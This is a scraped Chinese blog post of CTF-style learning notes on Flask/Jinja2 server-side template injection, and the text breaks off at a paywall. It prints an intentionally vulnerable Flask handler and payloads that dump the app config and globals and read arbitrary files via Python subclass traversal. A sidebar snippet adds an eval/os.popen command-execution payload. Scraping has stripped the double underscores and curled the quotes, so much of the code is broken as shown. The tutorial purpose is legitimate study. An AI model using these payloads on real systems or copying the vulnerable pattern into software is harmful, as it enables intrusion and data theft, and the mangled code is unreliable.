python flask ssti学习笔记

最新推荐文章于 2024-06-22 18:34:24 发布
最新推荐文章于 2024-06-22 18:34:24 发布
阅读量785 收藏 1
点赞数
文章标签: flask python 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65129142/article/details/122059723
版权

python flask ssti学习笔记
学ssti就像是对python原理的一层深入探索,入口很简单,就是用户输入未经过滤便被服务器模板渲染,将其当作变量解析替换,从而达到读取文件或者执行命令等目的

简单示范
漏洞代码:

#!/usr/bin/env python

-- coding:utf8 --

import hashlib
import logging
import urllib.parse#python2没有parse,去掉就好
from flask import Flask
from flask import request
from flask import config
from flask import render_template_string

app = Flask(name)
app.config.secret_key = “2333”
page_size = 60

@app.route(’/’)
def hello_world():
return ‘Hello World!’

@app.errorhandler(404)
def page_not_found(e):
template = ‘’’
{%% block body %%}

Oops! That page doesn't exist.

%s

{%% endblock %%} ''' % (urllib.parse.unquote(request.url))#python2没有parse,去掉就好 return render_template_string(template), 404

if name == ‘main’:
app.run()
以上代码存在ssti漏洞点在于render_template_string函数在渲染模板的时候使用了%s来动态的替换字符串,我们知道Flask 中使用了Jinja2 作为模板渲染引擎,{ {}}在Jinja2中作为变量包裹标识符,Jinja2在渲染的时候会把{ {}}包裹的内容当做变量解析替换。

简单验证
image-20200202201526733

服务器将{ {}}的内容直接执行后返回了结果

image-20200202201646169

直接返回出配置变量值,存在敏感信息

入门操作
爆全局变量
{ {self.dict}}
任意文件读取
ctf题目中大多数是需要读取flag或者读取其他源码的

接下来利用一些骚操作读取文件吧

python中,不用引入直接使用的内置函数称为 builtin 函数,例如我们通常用的open,chr,ord等等

builtin.open()
builtin.int()
builtin.chr()
image-20200217204039400

#python一切皆对象,__class__方法可以获取当前对象(实例)的类

“”.class
<class ‘str’>

#class.mro 获取当前类对象的所有继承类(object类是python中最顶层的类。)

“”.class.mro
(<class ‘str’>, <class ‘object’>)

#object.subclasses() 返回object的子类,不加括号的话返回的是地址

“”.class.mro[-1].subclasses()
[<class ‘type’>, <class ‘weakref’>, <class ‘weakcallableproxy’>, <class ‘weakproxy’>, <class ‘int’>, <class ‘bytearray’>, <class ‘bytes’>, <class ‘list’>, <class ‘NoneType’>,…,]
利用关键字寻找与读文件有关的类

Python2

image-20200202205202185

for i in ‘’.class.mro[-1].subclasses():
count += 1
if ‘file’ in repr(i):
print count, i
//40 <type ‘file’>
这不是我们很熟悉的file吗,直接用就好了

{ {’’.class.mro[-1].subclasses()40.read()}}
image-20200202205714666

或者让我们更加深入一点

#__init__初始化类

‘’.class.mro[-1].init
<slot wrapper ‘init’ of ‘object’ objects>

#因为object类下面没有我们需要的东西,我们只能去它的子类找
#在获取初始化属性后,带wrapper的说明没有重载,寻找不带warpper的
count = -1
for i in ().

最低0.47元/天 解锁文章
球球121
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Python Flask 并发处理笔记.md
08-15
本文全面介绍了Python Flask框架中的并发处理,内容涵盖并发的概念、目的,以及Flask中使用多线程和Gevent实现并发的方法,最后结合高并发Web服务器、数据爬取和科学计算等场景,给出了并发处理的实际应用示例,既适合...
Python Flask 数据库操作笔记.md
08-15
本文既适合FlaskPython开发的初学者从零开始学习数据库操作,也适合想要 Refresh 和参考Flask数据库访问代码的爱好者。掌握数据库操作是Web开发的基础。 能学到什么: 通过学习可以掌握在Flask中进行数据库连接、...
83 CTF夺旗-Python考点SSTI&反序列化&字符串
山兔的博客
02-07 1139
MISC(安全杂项):全称Miscellaneous。题目涉及流量分析、电子取证、人肉搜索、数据分析、大数据统计等等,覆盖面比较广。我们平时看到的社工类题目;给你一个流量包让你分析的题目;取证分析题目;都属于这类题目。主要考查参赛选手的各种基础综合知识,考察范围比较广。PPC(编程类):全称Professionally Program Coder。题目涉及到程序编写、编程算法实现。算法的逆向编写,批量处理等,有时候用编程去处理问题,会方便的多。当然PPC相比ACM来说,还是较为容易的。
适合小白学的基础知识—SSTI漏洞学习
Innocence_0的博客
02-12 545
适合小白学的基础知识—SSTI漏洞学习
Python Flask应用之SSTI初探
qq_38755190的博客
01-28 544
Falsk是什么? Flask是一个轻量级的可定制框架,使用Python语言编写,较其他同类型框架更为灵活、轻便、安全且容易上手。它可以很好地结合MVC模式进行开发,开发人员分工合作,小型团队在短时间内就可以完成功能丰富的中小型网站或Web服务的实现。 Flask最重要的特点。Flask的两个主要核心应用是Werkzeug和模板引擎Jinja。 Flask的安装 我用的是windows系统,在装有python的系统上,直接打开cmd窗口,我们输入一下命令: pip install Flask
[python]浅谈FlaskSSTI漏洞
记录学习,一起进步
04-03 1194
[python]浅谈FlaskSSTI漏洞
SSTI模块注入】SSTI+Flask+Python(上):基础知识
07-25 573
SSTI】基础知识
buuctf [pasecactf_2019]flask_ssti
CyhDl666的博客
03-18 1194
题目已经告诉是SSTI模板注入了 测试一下 做题时用""发现了过滤 fuzz一下 过滤了很多东西 想到去年打校赛自己未解出来的一题 结合题目提示 是个16进制转换 附上自己写的python脚本 code = "/proc/self/fd/1" ssti = "" length = len(code) for i in range(length): ssti += "\\x" + hex(ord(code[i]))[2:] print(ssti) 将下面内容转化为16进制 __class__.
SSTI简单总结和例题
Aiwin的博客
07-21 2603
SSTI简单总结和例题CISCN 2019华东南]Double Secret和[护网杯 2018]easy_tornado
基于Python Flask的在线成绩发布学习平台开源项目
03-25
项目概述:基于Python Flask的在线成绩发布学习平台是一个开源项目,主要采用Python语言开发,同时融合了Shell脚本、HTML、CSS和JavaScript等技术。该项目包含22个文件,其中具体文件类型分布为:Shell脚本6个,...
python flask文件服务器
11-19
使用python flask实现带有认证功能的简易文件服务器,可实现文件的上传与下载。其中/uploads是上传,/downloads是下载
flask框架学习笔记
04-16
flask框架学习笔记
anaconda(Spyder)多进程 Python Multiprocessing error: AttributeError: module '__main__' has no attribute
记录生活
12-29 6065
Error message: AttributeError: module ‘main’ has no attribute ‘spec’ Full example code: from multiprocessing import Pool def f(x): return x*x if __name__ == '__main__': with Pool(5) as p: ...
SSTI入门详解
E1even的博客
03-15 4978
关于基于flaskSSTI漏洞的阶段学习小结: SSTI的理解: SSTI和SQL注入原理差不多,都是因为对输入的字符串控制不足,把输入的字符串当成命令执行。 SSTI引发的真正原因: render_template渲染函数的问题 render_template渲染函数是什么: 就是把HTML涉及的页面与用户数据分离开,这样方便展示和管理。当用户输入自己的数据信息,HTML页面可以根据用户自身的信息来展示页面,因此才有了这个函数的使用。 ...
SSTI学习记录
cjdgg的博客
05-03 1512
SSTI学习记录环境语法变量过滤器 环境 from flask import Flask from flask import render_template from flask import request from flask import render_template_string app = Flask(__name__) @app.route('/test/') def test(): code = request.args.get('id') template = '''
ctf ssti 各种payload与绕过(后续会补充 绕过)
m0_59855041的博客
06-07 437
_class__ 返回一个实例所属的类__mro__ 查看类继承的所有父类,直到object__subclasses__() 获取一个类的子类,返回的是一个列表__bases__ 返回一个类直接所继承的类(元组形式)__init__ 类实例创建之后调用, 对当前对象的实例的一些初始化__globals__ 使用方式是 函数名.__globals__,返回一个当前空间下能使用的模块,方法和变量的字典,与func_globals等价。
SSTI刷题总结
qq_53755216的博客
04-08 1051
#命令执行: {% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__=='catch_warnings' %} {{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('id').read()") }} {% endif %} {% endfor %} #文件操作 {% for c in [].__class__.__base__.__s
flask模板注入(ssti),一篇就够了
热门推荐
qq_59950255的博客
03-02 1万+
1.什么是flask? flask是用python编写的一个轻量web开发框架 2.ssti成因 flask使用jinjia2渲染引擎进行网页渲染,当处理不得当,未进行语句过滤,用户输入{{控制语句}},会导致渲染出恶意代码,形成注入 本地演示(需要自行安装flask,requests模块) 通过输入参数key可以进行简单的渲染,创造新的网页 当我们把render_template 换成render_template_string后,并对参数不进行处理 看看结果 代码执.
Flask学习
最新发布
qq_32342205的博客
06-22 120
学习使用 python 编写 Flask 接口。
基于Python,flask学习笔记系统怎么建立
07-10
要基于PythonFlask建立一个学习笔记系统,你可以按照以下步骤进行: 1. 安装PythonFlask:首先,确保你的计算机上安装了Python。然后,使用pip命令安装Flask框架。在命令行中执行以下命令: ``` pip install Flask ``` 2. 创建Flask应用:在你选择的目录下创建一个新的文件夹,用于存放你的应用程序。进入该文件夹,并创建一个名为app.py的Python脚本文件。 3. 导入依赖:在app.py文件中,导入必要的模块和库: ```python from flask import Flask, render_template, request ``` 4. 初始化Flask应用:在app.py文件中,初始化Flask应用: ```python app = Flask(__name__) ``` 5. 创建路由和视图函数:根据你的学习笔记系统的需求,创建不同的路由和对应的视图函数。例如,你可以创建一个用于显示学习笔记列表的路由: ```python @app.route('/notes') def notes(): # 在这里编写代码来获取学习笔记列表,并将其传递给模板 return render_template('notes.html', notes=notes_list) ``` 6. 创建模板:在你的应用程序文件夹中创建一个名为templates的文件夹,并在其中创建一个名为notes.html的模板文件。在模板文件中,你可以使用Flask提供的模板语法来显示学习笔记列表: ```html <h1>学习笔记列表</h1> <ul> {% for note in notes %} <li>{{ note }}</li> {% endfor %} </ul> ``` 7. 运行应用:在命令行中,使用以下命令运行你的应用: ``` python app.py ``` 现在,你的基于PythonFlask学习笔记系统就可以运行了。你可以根据需要添加更多的路由和视图函数,以及其他功能如添加、编辑和删除学习笔记等。同时,你可以探索Flask的文档和教程,以深入了解如何构建更复杂的应用程序。祝你成功!

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值